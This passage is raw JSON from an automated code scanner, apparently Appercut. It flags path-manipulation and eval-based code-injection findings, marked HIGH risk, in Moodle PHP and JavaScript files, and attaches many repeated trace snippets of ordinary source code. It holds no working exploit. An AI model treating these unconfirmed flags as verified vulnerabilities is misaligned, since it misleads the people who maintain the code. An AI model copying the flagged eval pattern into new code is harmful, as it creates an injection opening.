null;\n }\n\n", "vulnerId": "APPCUT:62:14657", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/testing/classes/util.php", "code": "\n if (!file_exists(\"$CFG->dirroot/.git/HEAD\")) {\n return null;\n }\n\n $headcontent = file_get_contents(\"$CFG->dirroot/.git/HEAD\");\n if ($headcontent === false) {\n return null;\n }\n\n $headcontent = trim($headcontent);\n", "functionName": "Global.testing_util::get_git_hash", "endLineNumber": 869, "positionInStartLine": 8, "positionInEndLine": 67, "appercutAttackItemId": 9354, "startLineNumber": 869}, {"sourceFileName": "moodle/lib/testing/classes/util.php", "code": " }\n\n $headcontent = trim($headcontent);\n\n // If it is pointing to a hash we return it directly.\n if (strlen($headcontent) === 40) {\n return $headcontent;\n }\n\n if (strpos($headcontent, 'ref: ') !== 0) {\n return null;\n", "functionName": "Global.testing_util::get_git_hash", "endLineNumber": 877, "positionInStartLine": 12, "positionInEndLine": 33, "appercutAttackItemId": 9356, "startLineNumber": 877}, {"sourceFileName": "moodle/lib/testing/classes/util.php", "code": " $headcontent = file_get_contents(\"$CFG->dirroot/.git/HEAD\");\n if ($headcontent === false) {\n return null;\n }\n\n $headcontent = trim($headcontent);\n\n // If it is pointing to a hash we return it directly.\n if (strlen($headcontent) === 40) {\n return $headcontent;\n }\n", "functionName": "Global.testing_util::get_git_hash", "endLineNumber": 874, "positionInStartLine": 8, "positionInEndLine": 41, "appercutAttackItemId": 9355, "startLineNumber": 874}, {"sourceFileName": "moodle/lib/testing/classes/util.php", "code": "\n if (!file_exists(\"$CFG->dirroot/.git/$ref\")) {\n return null;\n }\n\n $hash = file_get_contents(\"$CFG->dirroot/.git/$ref\");\n\n if ($hash === false) {\n return null;\n }\n\n", "functionName": "Global.testing_util::get_git_hash", "endLineNumber": 891, "positionInStartLine": 16, "positionInEndLine": 60, "appercutAttackItemId": 9360, "startLineNumber": 891}, {"sourceFileName": "moodle/lib/testing/classes/util.php", "code": "\n if (strpos($headcontent, 'ref: ') !== 0) {\n return null;\n }\n\n $ref = substr($headcontent, 5);\n\n if (!file_exists(\"$CFG->dirroot/.git/$ref\")) {\n return null;\n }\n\n", "functionName": "Global.testing_util::get_git_hash", "endLineNumber": 885, "positionInStartLine": 8, "positionInEndLine": 38, "appercutAttackItemId": 9358, "startLineNumber": 885}, {"sourceFileName": "moodle/lib/testing/classes/util.php", "code": " return null;\n }\n\n $ref = substr($headcontent, 5);\n\n if (!file_exists(\"$CFG->dirroot/.git/$ref\")) {\n return null;\n }\n\n $hash = file_get_contents(\"$CFG->dirroot/.git/$ref\");\n\n", "functionName": "Global.testing_util::get_git_hash", "endLineNumber": 887, "positionInStartLine": 13, "positionInEndLine": 51, "appercutAttackItemId": 9359, "startLineNumber": 887}, {"sourceFileName": "moodle/lib/testing/classes/util.php", "code": " // If it is pointing to a hash we return it directly.\n if (strlen($headcontent) === 40) {\n return $headcontent;\n }\n\n if (strpos($headcontent, 'ref: ') !== 0) {\n return null;\n }\n\n $ref = substr($headcontent, 5);\n\n", "functionName": "Global.testing_util::get_git_hash", "endLineNumber": 881, "positionInStartLine": 12, "positionInEndLine": 42, "appercutAttackItemId": 9357, "startLineNumber": 881}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionPath.html", "positionInStartLine": 16, "patternDescription": "In order to define relative paths in file system, \u201c./\u201d \u201cand \u201c../\u201d characters are often used (with backslashes in Windows), representing current and parent directories, respectively. If the application responsible for forming paths to necessary files uses external data, the malicious user can advantage of it if the input is not filtered properly. As a result, the malicious user can read or write application server local files that were not intended by the developer.", "appercutVulnerName": "File System Path Manipulation", "endLineNumber": 891, "positionInEndLine": 60, "startLineNumber": 891, "patternCodeLanguage": "PHP", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " }\n break;\n case 'cmi.interactions.n.id':\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n eval(parentelement + '._count++;');\n eval(subelement + ' = new Object();');\n var subobject = eval(subelement);\n subobject.objectives = new Object();\n subobject.objectives._count = 0;\n }\n break;\n", "vulnerId": "APPCUT:62:14437", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 56, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 553, "positionInEndLine": 89, "startLineNumber": 553, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " ignore_user_abort($prev);\n throw new file_exception('storedfilecannotcreatefile');\n }\n if (filesize($hashfile.'.tmp') !== $filesize) {\n // Out of disk space?\n unlink($hashfile.'.tmp');\n ignore_user_abort($prev);\n throw new file_exception('storedfilecannotcreatefile');\n }\n rename($hashfile.'.tmp', $hashfile);\n chmod($hashfile, $this->filepermissions); // Fix permissions if needed.\n", "vulnerId": "APPCUT:62:14656", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " $prev = ignore_user_abort(true);\n\n if (!empty($CFG->preventfilelocking)) {\n $newsize = file_put_contents($hashfile.'.tmp', $content);\n } else {\n $newsize = file_put_contents($hashfile.'.tmp', $content, LOCK_EX);\n }\n\n if ($newsize === false) {\n // Borked permissions most likely.\n ignore_user_abort($prev);\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2044, "positionInStartLine": 23, "positionInEndLine": 77, "appercutAttackItemId": 9351, "startLineNumber": 2044}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " // Hopefully this works around most potential race conditions.\n\n $prev = ignore_user_abort(true);\n\n if (!empty($CFG->preventfilelocking)) {\n $newsize = file_put_contents($hashfile.'.tmp', $content);\n } else {\n $newsize = file_put_contents($hashfile.'.tmp', $content, LOCK_EX);\n }\n\n if ($newsize === false) {\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2042, "positionInStartLine": 23, "positionInEndLine": 68, "appercutAttackItemId": 9350, "startLineNumber": 2042}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": "\n if (file_exists($hashfile)) {\n if (filesize($hashfile) === $filesize) {\n return array($contenthash, $filesize, false);\n }\n if (sha1_file($hashfile) === $contenthash) {\n // Jackpot! We have a sha1 collision.\n mkdir(\"$this->filedir/jackpot/\", $this->dirpermissions, true);\n copy($hashfile, \"$this->filedir/jackpot/{$contenthash}_1\");\n file_put_contents(\"$this->filedir/jackpot/{$contenthash}_2\", $content);\n throw new file_pool_content_exception($contenthash);\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2018, "positionInStartLine": 16, "positionInEndLine": 37, "appercutAttackItemId": 9347, "startLineNumber": 2018}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " * @return array (contenthash, filesize, newfile)\n */\n public function add_string_to_pool($content) {\n global $CFG;\n\n $contenthash = sha1($content);\n $filesize = strlen($content); // binary length\n\n $hashpath = $this->path_from_hash($contenthash);\n $hashfile = \"$hashpath/$contenthash\";\n\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2006, "positionInStartLine": 8, "positionInEndLine": 37, "appercutAttackItemId": 9339, "startLineNumber": 2006}, {"sourceFileName": "moodle/badges/lib/bakerlib.php", "code": " * Unpacks file chunks and reads them into an array.\n *\n * @param string $contents File content as a string\n */\n public function __construct($contents) {\n $this->_contents = $contents;\n $png_signature = pack(\"C8\", 137, 80, 78, 71, 13, 10, 26, 10);\n\n // Read 8 bytes of PNG header and verify.\n $header = substr($this->_contents, 0, 8);\n\n", "functionName": "Global.PNG_MetaDataHandler::Constructor", "endLineNumber": 60, "positionInStartLine": 8, "positionInEndLine": 36, "appercutAttackItemId": 9332, "startLineNumber": 60}, {"sourceFileName": "moodle/badges/lib/bakerlib.php", "code": "\n $result = substr($this->_contents, 0, $this->_size - 12)\n . $newchunk\n . substr($this->_contents, $this->_size - 12, 12);\n\n return $result;\n }\n}\n", "functionName": "Global.PNG_MetaDataHandler::add_chunks", "endLineNumber": 139, "positionInStartLine": 8, "positionInEndLine": 22, "appercutAttackItemId": 9335, "startLineNumber": 139}, {"sourceFileName": "moodle/lib/badgeslib.php", "code": " 'filepath' => '/',\n 'filename' => $hash . '.png',\n );\n\n // Create a file with added contents.\n $newfile = $fs->create_file_from_string($fileinfo, $newcontents);\n if ($pathhash) {\n return $newfile->get_pathnamehash();\n }\n }\n } else {\n", "functionName": "Global.GlobalContext::badges_bake", "endLineNumber": 1035, "positionInStartLine": 32, "positionInEndLine": 80, "appercutAttackItemId": 9337, "startLineNumber": 1035}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " * @return string expected file location\n */\n protected function path_from_hash($contenthash) {\n $l1 = $contenthash[0].$contenthash[1];\n $l2 = $contenthash[2].$contenthash[3];\n return \"$this->filedir/$l1/$l2\";\n }\n\n /**\n * Return path to file with given hash.\n *\n", "functionName": "Global.file_storage::path_from_hash", "endLineNumber": 2105, "positionInStartLine": 8, "positionInEndLine": 39, "appercutAttackItemId": 9342, "startLineNumber": 2105}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " ignore_user_abort($prev);\n throw new file_exception('storedfilecannotcreatefile');\n }\n if (filesize($hashfile.'.tmp') !== $filesize) {\n // Out of disk space?\n unlink($hashfile.'.tmp');\n ignore_user_abort($prev);\n throw new file_exception('storedfilecannotcreatefile');\n }\n rename($hashfile.'.tmp', $hashfile);\n chmod($hashfile, $this->filepermissions); // Fix permissions if needed.\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2054, "positionInStartLine": 12, "positionInEndLine": 36, "appercutAttackItemId": 9353, "startLineNumber": 2054}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " return array($contenthash, $filesize, false);\n }\n if (sha1_file($hashfile) === $contenthash) {\n // Jackpot! We have a sha1 collision.\n mkdir(\"$this->filedir/jackpot/\", $this->dirpermissions, true);\n copy($hashfile, \"$this->filedir/jackpot/{$contenthash}_1\");\n file_put_contents(\"$this->filedir/jackpot/{$contenthash}_2\", $content);\n throw new file_pool_content_exception($contenthash);\n }\n debugging(\"Replacing invalid content file $contenthash\");\n unlink($hashfile);\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2021, "positionInStartLine": 16, "positionInEndLine": 74, "appercutAttackItemId": 9348, "startLineNumber": 2021}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " global $CFG;\n\n $contenthash = sha1($content);\n $filesize = strlen($content); // binary length\n\n $hashpath = $this->path_from_hash($contenthash);\n $hashfile = \"$hashpath/$contenthash\";\n\n $newfile = true;\n\n if (file_exists($hashfile)) {\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2009, "positionInStartLine": 8, "positionInEndLine": 55, "appercutAttackItemId": 9343, "startLineNumber": 2009}, {"sourceFileName": "moodle/badges/lib/bakerlib.php", "code": "\n // Chunk format: length + type + data + CRC.\n // CRC is a CRC-32 computed over the chunk type and chunk data.\n $newchunk = $len . $type . $data . $crc;\n\n $result = substr($this->_contents, 0, $this->_size - 12)\n . $newchunk\n . substr($this->_contents, $this->_size - 12, 12);\n\n return $result;\n }\n}\n", "functionName": "Global.PNG_MetaDataHandler::add_chunks", "endLineNumber": 136, "positionInStartLine": 18, "positionInEndLine": 16, "appercutAttackItemId": 9333, "startLineNumber": 135}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " $hashpath = $this->path_from_hash($contenthash);\n $hashfile = \"$hashpath/$contenthash\";\n\n $newfile = true;\n\n if (file_exists($hashfile)) {\n if (filesize($hashfile) === $filesize) {\n return array($contenthash, $filesize, false);\n }\n if (sha1_file($hashfile) === $contenthash) {\n // Jackpot! We have a sha1 collision.\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2014, "positionInStartLine": 12, "positionInEndLine": 34, "appercutAttackItemId": 9345, "startLineNumber": 2014}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " global $CFG;\n\n $contenthash = sha1($content);\n $filesize = strlen($content); // binary length\n\n $hashpath = $this->path_from_hash($contenthash);\n $hashfile = \"$hashpath/$contenthash\";\n\n $newfile = true;\n\n if (file_exists($hashfile)) {\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2009, "positionInStartLine": 27, "positionInEndLine": 55, "appercutAttackItemId": 9340, "startLineNumber": 2009}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " *\n * @param string $contenthash content hash\n * @return string expected file location\n */\n protected function path_from_hash($contenthash) {\n $l1 = $contenthash[0].$contenthash[1];\n $l2 = $contenthash[2].$contenthash[3];\n return \"$this->filedir/$l1/$l2\";\n }\n\n /**\n", "functionName": "Global.file_storage::path_from_hash", "endLineNumber": 2103, "positionInStartLine": 8, "positionInEndLine": 45, "appercutAttackItemId": 9341, "startLineNumber": 2103}, {"sourceFileName": "moodle/lib/badgeslib.php", "code": "\n $filehandler = new PNG_MetaDataHandler($contents);\n $assertion = new moodle_url('/badges/assertion.php', array('b' => $hash));\n if ($filehandler->check_chunks(\"tEXt\", \"openbadges\")) {\n // Add assertion URL tExt chunk.\n $newcontents = $filehandler->add_chunks(\"tEXt\", \"openbadges\", $assertion->out(false));\n $fileinfo = array(\n 'contextid' => $user_context->id,\n 'component' => 'badges',\n 'filearea' => 'userbadge',\n 'itemid' => $badge->id,\n", "functionName": "Global.GlobalContext::badges_bake", "endLineNumber": 1024, "positionInStartLine": 16, "positionInEndLine": 101, "appercutAttackItemId": 9336, "startLineNumber": 1024}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " copy($hashfile, \"$this->filedir/jackpot/{$contenthash}_1\");\n file_put_contents(\"$this->filedir/jackpot/{$contenthash}_2\", $content);\n throw new file_pool_content_exception($contenthash);\n }\n debugging(\"Replacing invalid content file $contenthash\");\n unlink($hashfile);\n $newfile = false;\n }\n\n if (!is_dir($hashpath)) {\n if (!mkdir($hashpath, $this->dirpermissions, true)) {\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2026, "positionInStartLine": 12, "positionInEndLine": 29, "appercutAttackItemId": 9349, "startLineNumber": 2026}, {"sourceFileName": "moodle/lib/badgeslib.php", "code": " $user_context = context_user::instance($userid);\n\n $fs = get_file_storage();\n if (!$fs->file_exists($user_context->id, 'badges', 'userbadge', $badge->id, '/', $hash . '.png')) {\n if ($file = $fs->get_file($badge_context->id, 'badges', 'badgeimage', $badge->id, '/', 'f1.png')) {\n $contents = $file->get_content();\n\n $filehandler = new PNG_MetaDataHandler($contents);\n $assertion = new moodle_url('/badges/assertion.php', array('b' => $hash));\n if ($filehandler->check_chunks(\"tEXt\", \"openbadges\")) {\n // Add assertion URL tExt chunk.\n", "functionName": "Global.GlobalContext::badges_bake", "endLineNumber": 1018, "positionInStartLine": 12, "positionInEndLine": 44, "appercutAttackItemId": 9330, "startLineNumber": 1018}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " if ($newsize === false) {\n // Borked permissions most likely.\n ignore_user_abort($prev);\n throw new file_exception('storedfilecannotcreatefile');\n }\n if (filesize($hashfile.'.tmp') !== $filesize) {\n // Out of disk space?\n unlink($hashfile.'.tmp');\n ignore_user_abort($prev);\n throw new file_exception('storedfilecannotcreatefile');\n }\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2052, "positionInStartLine": 12, "positionInEndLine": 39, "appercutAttackItemId": 9352, "startLineNumber": 2052}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": "\n $contenthash = sha1($content);\n $filesize = strlen($content); // binary length\n\n $hashpath = $this->path_from_hash($contenthash);\n $hashfile = \"$hashpath/$contenthash\";\n\n $newfile = true;\n\n if (file_exists($hashfile)) {\n if (filesize($hashfile) === $filesize) {\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2010, "positionInStartLine": 8, "positionInEndLine": 44, "appercutAttackItemId": 9344, "startLineNumber": 2010}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " $newrecord->author = empty($filerecord->author) ? null : $filerecord->author;\n $newrecord->license = empty($filerecord->license) ? null : $filerecord->license;\n $newrecord->status = empty($filerecord->status) ? 0 : $filerecord->status;\n $newrecord->sortorder = $filerecord->sortorder;\n\n list($newrecord->contenthash, $newrecord->filesize, $newfile) = $this->add_string_to_pool($content);\n $filepathname = $this->path_from_hash($newrecord->contenthash) . '/' . $newrecord->contenthash;\n // get mimetype by magic bytes\n $newrecord->mimetype = empty($filerecord->mimetype) ? $this->mimetype($filepathname, $filerecord->filename) : $filerecord->mimetype;\n\n $newrecord->pathnamehash = $this->get_pathname_hash($newrecord->contextid, $newrecord->component, $newrecord->filearea, $newrecord->itemid, $newrecord->filepath, $newrecord->filename);\n", "functionName": "Global.file_storage::create_file_from_string", "endLineNumber": 1577, "positionInStartLine": 79, "positionInEndLine": 107, "appercutAttackItemId": 9338, "startLineNumber": 1577}, {"sourceFileName": "moodle/lib/badgeslib.php", "code": " $fs = get_file_storage();\n if (!$fs->file_exists($user_context->id, 'badges', 'userbadge', $badge->id, '/', $hash . '.png')) {\n if ($file = $fs->get_file($badge_context->id, 'badges', 'badgeimage', $badge->id, '/', 'f1.png')) {\n $contents = $file->get_content();\n\n $filehandler = new PNG_MetaDataHandler($contents);\n $assertion = new moodle_url('/badges/assertion.php', array('b' => $hash));\n if ($filehandler->check_chunks(\"tEXt\", \"openbadges\")) {\n // Add assertion URL tExt chunk.\n $newcontents = $filehandler->add_chunks(\"tEXt\", \"openbadges\", $assertion->out(false));\n $fileinfo = array(\n", "functionName": "Global.GlobalContext::badges_bake", "endLineNumber": 1020, "positionInStartLine": 27, "positionInEndLine": 61, "appercutAttackItemId": 9331, "startLineNumber": 1020}, {"sourceFileName": "moodle/badges/lib/bakerlib.php", "code": "\n // Chunk format: length + type + data + CRC.\n // CRC is a CRC-32 computed over the chunk type and chunk data.\n $newchunk = $len . $type . $data . $crc;\n\n $result = substr($this->_contents, 0, $this->_size - 12)\n . $newchunk\n . substr($this->_contents, $this->_size - 12, 12);\n\n return $result;\n }\n}\n", "functionName": "Global.PNG_MetaDataHandler::add_chunks", "endLineNumber": 137, "positionInStartLine": 8, "positionInEndLine": 65, "appercutAttackItemId": 9334, "startLineNumber": 135}, {"sourceFileName": "moodle/lib/filestorage/stored_file.php", "code": " if (!is_readable($path)) {\n if (!$this->fs->try_content_recovery($this) or !is_readable($path)) {\n throw new file_exception('storedfilecannotread', '', $path);\n }\n }\n return file_get_contents($this->get_content_file_location());\n }\n\n /**\n * Copy content of file to given pathname.\n *\n", "functionName": "Global.stored_file::get_content", "endLineNumber": 463, "positionInStartLine": 8, "positionInEndLine": 68, "appercutAttackItemId": 9329, "startLineNumber": 463}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " $hashfile = \"$hashpath/$contenthash\";\n\n $newfile = true;\n\n if (file_exists($hashfile)) {\n if (filesize($hashfile) === $filesize) {\n return array($contenthash, $filesize, false);\n }\n if (sha1_file($hashfile) === $contenthash) {\n // Jackpot! We have a sha1 collision.\n mkdir(\"$this->filedir/jackpot/\", $this->dirpermissions, true);\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2015, "positionInStartLine": 16, "positionInEndLine": 36, "appercutAttackItemId": 9346, "startLineNumber": 2015}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionPath.html", "positionInStartLine": 12, "patternDescription": "In order to define relative paths in file system, \u201c./\u201d \u201cand \u201c../\u201d characters are often used (with backslashes in Windows), representing current and parent directories, respectively. If the application responsible for forming paths to necessary files uses external data, the malicious user can advantage of it if the input is not filtered properly. As a result, the malicious user can read or write application server local files that were not intended by the developer.", "appercutVulnerName": "File System Path Manipulation", "endLineNumber": 2054, "positionInEndLine": 36, "startLineNumber": 2054, "patternCodeLanguage": "PHP", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " // Hopefully this works around most potential race conditions.\n\n $prev = ignore_user_abort(true);\n\n if (!empty($CFG->preventfilelocking)) {\n $newsize = file_put_contents($hashfile.'.tmp', $content);\n } else {\n $newsize = file_put_contents($hashfile.'.tmp', $content, LOCK_EX);\n }\n\n if ($newsize === false) {\n", "vulnerId": "APPCUT:62:14660", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " * @return array (contenthash, filesize, newfile)\n */\n public function add_string_to_pool($content) {\n global $CFG;\n\n $contenthash = sha1($content);\n $filesize = strlen($content); // binary length\n\n $hashpath = $this->path_from_hash($contenthash);\n $hashfile = \"$hashpath/$contenthash\";\n\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2006, "positionInStartLine": 8, "positionInEndLine": 37, "appercutAttackItemId": 9371, "startLineNumber": 2006}, {"sourceFileName": "moodle/lib/badgeslib.php", "code": " $user_context = context_user::instance($userid);\n\n $fs = get_file_storage();\n if (!$fs->file_exists($user_context->id, 'badges', 'userbadge', $badge->id, '/', $hash . '.png')) {\n if ($file = $fs->get_file($badge_context->id, 'badges', 'badgeimage', $badge->id, '/', 'f1.png')) {\n $contents = $file->get_content();\n\n $filehandler = new PNG_MetaDataHandler($contents);\n $assertion = new moodle_url('/badges/assertion.php', array('b' => $hash));\n if ($filehandler->check_chunks(\"tEXt\", \"openbadges\")) {\n // Add assertion URL tExt chunk.\n", "functionName": "Global.GlobalContext::badges_bake", "endLineNumber": 1018, "positionInStartLine": 12, "positionInEndLine": 44, "appercutAttackItemId": 9362, "startLineNumber": 1018}, {"sourceFileName": "moodle/badges/lib/bakerlib.php", "code": "\n // Chunk format: length + type + data + CRC.\n // CRC is a CRC-32 computed over the chunk type and chunk data.\n $newchunk = $len . $type . $data . $crc;\n\n $result = substr($this->_contents, 0, $this->_size - 12)\n . $newchunk\n . substr($this->_contents, $this->_size - 12, 12);\n\n return $result;\n }\n}\n", "functionName": "Global.PNG_MetaDataHandler::add_chunks", "endLineNumber": 136, "positionInStartLine": 18, "positionInEndLine": 16, "appercutAttackItemId": 9365, "startLineNumber": 135}, {"sourceFileName": "moodle/lib/badgeslib.php", "code": " $fs = get_file_storage();\n if (!$fs->file_exists($user_context->id, 'badges', 'userbadge', $badge->id, '/', $hash . '.png')) {\n if ($file = $fs->get_file($badge_context->id, 'badges', 'badgeimage', $badge->id, '/', 'f1.png')) {\n $contents = $file->get_content();\n\n $filehandler = new PNG_MetaDataHandler($contents);\n $assertion = new moodle_url('/badges/assertion.php', array('b' => $hash));\n if ($filehandler->check_chunks(\"tEXt\", \"openbadges\")) {\n // Add assertion URL tExt chunk.\n $newcontents = $filehandler->add_chunks(\"tEXt\", \"openbadges\", $assertion->out(false));\n $fileinfo = array(\n", "functionName": "Global.GlobalContext::badges_bake", "endLineNumber": 1020, "positionInStartLine": 27, "positionInEndLine": 61, "appercutAttackItemId": 9363, "startLineNumber": 1020}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": "\n $contenthash = sha1($content);\n $filesize = strlen($content); // binary length\n\n $hashpath = $this->path_from_hash($contenthash);\n $hashfile = \"$hashpath/$contenthash\";\n\n $newfile = true;\n\n if (file_exists($hashfile)) {\n if (filesize($hashfile) === $filesize) {\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2010, "positionInStartLine": 8, "positionInEndLine": 44, "appercutAttackItemId": 9376, "startLineNumber": 2010}, {"sourceFileName": "moodle/badges/lib/bakerlib.php", "code": " * Unpacks file chunks and reads them into an array.\n *\n * @param string $contents File content as a string\n */\n public function __construct($contents) {\n $this->_contents = $contents;\n $png_signature = pack(\"C8\", 137, 80, 78, 71, 13, 10, 26, 10);\n\n // Read 8 bytes of PNG header and verify.\n $header = substr($this->_contents, 0, 8);\n\n", "functionName": "Global.PNG_MetaDataHandler::Constructor", "endLineNumber": 60, "positionInStartLine": 8, "positionInEndLine": 36, "appercutAttackItemId": 9364, "startLineNumber": 60}, {"sourceFileName": "moodle/lib/filestorage/stored_file.php", "code": " if (!is_readable($path)) {\n if (!$this->fs->try_content_recovery($this) or !is_readable($path)) {\n throw new file_exception('storedfilecannotread', '', $path);\n }\n }\n return file_get_contents($this->get_content_file_location());\n }\n\n /**\n * Copy content of file to given pathname.\n *\n", "functionName": "Global.stored_file::get_content", "endLineNumber": 463, "positionInStartLine": 8, "positionInEndLine": 68, "appercutAttackItemId": 9361, "startLineNumber": 463}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " $hashfile = \"$hashpath/$contenthash\";\n\n $newfile = true;\n\n if (file_exists($hashfile)) {\n if (filesize($hashfile) === $filesize) {\n return array($contenthash, $filesize, false);\n }\n if (sha1_file($hashfile) === $contenthash) {\n // Jackpot! We have a sha1 collision.\n mkdir(\"$this->filedir/jackpot/\", $this->dirpermissions, true);\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2015, "positionInStartLine": 16, "positionInEndLine": 36, "appercutAttackItemId": 9378, "startLineNumber": 2015}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " return array($contenthash, $filesize, false);\n }\n if (sha1_file($hashfile) === $contenthash) {\n // Jackpot! We have a sha1 collision.\n mkdir(\"$this->filedir/jackpot/\", $this->dirpermissions, true);\n copy($hashfile, \"$this->filedir/jackpot/{$contenthash}_1\");\n file_put_contents(\"$this->filedir/jackpot/{$contenthash}_2\", $content);\n throw new file_pool_content_exception($contenthash);\n }\n debugging(\"Replacing invalid content file $contenthash\");\n unlink($hashfile);\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2021, "positionInStartLine": 16, "positionInEndLine": 74, "appercutAttackItemId": 9380, "startLineNumber": 2021}, {"sourceFileName": "moodle/lib/badgeslib.php", "code": "\n $filehandler = new PNG_MetaDataHandler($contents);\n $assertion = new moodle_url('/badges/assertion.php', array('b' => $hash));\n if ($filehandler->check_chunks(\"tEXt\", \"openbadges\")) {\n // Add assertion URL tExt chunk.\n $newcontents = $filehandler->add_chunks(\"tEXt\", \"openbadges\", $assertion->out(false));\n $fileinfo = array(\n 'contextid' => $user_context->id,\n 'component' => 'badges',\n 'filearea' => 'userbadge',\n 'itemid' => $badge->id,\n", "functionName": "Global.GlobalContext::badges_bake", "endLineNumber": 1024, "positionInStartLine": 16, "positionInEndLine": 101, "appercutAttackItemId": 9368, "startLineNumber": 1024}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": "\n if (file_exists($hashfile)) {\n if (filesize($hashfile) === $filesize) {\n return array($contenthash, $filesize, false);\n }\n if (sha1_file($hashfile) === $contenthash) {\n // Jackpot! We have a sha1 collision.\n mkdir(\"$this->filedir/jackpot/\", $this->dirpermissions, true);\n copy($hashfile, \"$this->filedir/jackpot/{$contenthash}_1\");\n file_put_contents(\"$this->filedir/jackpot/{$contenthash}_2\", $content);\n throw new file_pool_content_exception($contenthash);\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2018, "positionInStartLine": 16, "positionInEndLine": 37, "appercutAttackItemId": 9379, "startLineNumber": 2018}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " global $CFG;\n\n $contenthash = sha1($content);\n $filesize = strlen($content); // binary length\n\n $hashpath = $this->path_from_hash($contenthash);\n $hashfile = \"$hashpath/$contenthash\";\n\n $newfile = true;\n\n if (file_exists($hashfile)) {\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2009, "positionInStartLine": 8, "positionInEndLine": 55, "appercutAttackItemId": 9375, "startLineNumber": 2009}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " * @return string expected file location\n */\n protected function path_from_hash($contenthash) {\n $l1 = $contenthash[0].$contenthash[1];\n $l2 = $contenthash[2].$contenthash[3];\n return \"$this->filedir/$l1/$l2\";\n }\n\n /**\n * Return path to file with given hash.\n *\n", "functionName": "Global.file_storage::path_from_hash", "endLineNumber": 2105, "positionInStartLine": 8, "positionInEndLine": 39, "appercutAttackItemId": 9374, "startLineNumber": 2105}, {"sourceFileName": "moodle/lib/badgeslib.php", "code": " 'filepath' => '/',\n 'filename' => $hash . '.png',\n );\n\n // Create a file with added contents.\n $newfile = $fs->create_file_from_string($fileinfo, $newcontents);\n if ($pathhash) {\n return $newfile->get_pathnamehash();\n }\n }\n } else {\n", "functionName": "Global.GlobalContext::badges_bake", "endLineNumber": 1035, "positionInStartLine": 32, "positionInEndLine": 80, "appercutAttackItemId": 9369, "startLineNumber": 1035}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " $hashpath = $this->path_from_hash($contenthash);\n $hashfile = \"$hashpath/$contenthash\";\n\n $newfile = true;\n\n if (file_exists($hashfile)) {\n if (filesize($hashfile) === $filesize) {\n return array($contenthash, $filesize, false);\n }\n if (sha1_file($hashfile) === $contenthash) {\n // Jackpot! We have a sha1 collision.\n", "functionName": "Global.file_storage::add_string_to_pool", "endLineNumber": 2014, "positionInStartLine": 12, "positionInEndLine": 34, "appercutAttackItemId": 9377, "startLineNumber": 2014}, {"sourceFileName": "moodle/lib/filestorage/file_storage.php", "code": " $newrecord->author = empty($filerecord->author) ? null : $filerecord->author;\n $newrecord->license = empty($filerecord->license) ? null : $filerecord->license;\n $newrecord->status = empty($filerecord->status) ? 0 : $filerecord->status;\n $newrecord->sortorder = $filerecord->sortorder;\n\n list($newrecord->contenthash, $newrecord->filesize, $newfile) = $this->add_string_to_pool($content);\n $filepathname = $this->path_from_hash($newrecord->contenthash) . 